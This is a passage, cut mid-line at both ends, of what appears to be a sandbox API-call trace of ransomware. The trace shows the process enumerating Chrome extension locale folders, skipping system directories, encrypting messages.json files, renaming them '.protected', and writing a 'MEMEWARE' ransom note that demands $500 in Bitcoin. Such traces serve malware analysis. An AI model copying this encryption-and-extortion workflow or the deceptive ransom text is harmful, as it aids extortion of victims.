lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.389] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.389] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.389] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 160 [0079.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.390] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.390] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.391] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.391] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.391] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.391] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.391] CloseHandle (hObject=0x164) returned 1 [0079.391] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko") returned 142 [0079.392] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.392] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*") returned 144 [0079.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.392] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.392] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\.") returned 144 [0079.392] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.392] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.392] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\..") returned 145 [0079.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.393] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.393] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.393] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.394] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.394] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.395] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.395] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.395] CloseHandle (hObject=0x168) returned 1 [0079.395] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected") returned 166 [0079.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.396] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.396] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.396] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 160 [0079.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.397] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.397] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.398] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.398] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.398] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.398] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.398] CloseHandle (hObject=0x164) returned 1 [0079.398] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.398] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt") returned 142 [0079.398] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.398] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*") returned 144 [0079.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\.") returned 144 [0079.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\..") returned 145 [0079.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.399] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.399] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.399] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.401] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11d, lpOverlapped=0x0) returned 1 [0079.402] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11d, lpOverlapped=0x0) returned 1 [0079.402] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.403] CloseHandle (hObject=0x168) returned 1 [0079.403] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected") returned 166 [0079.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.403] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.403] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.403] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 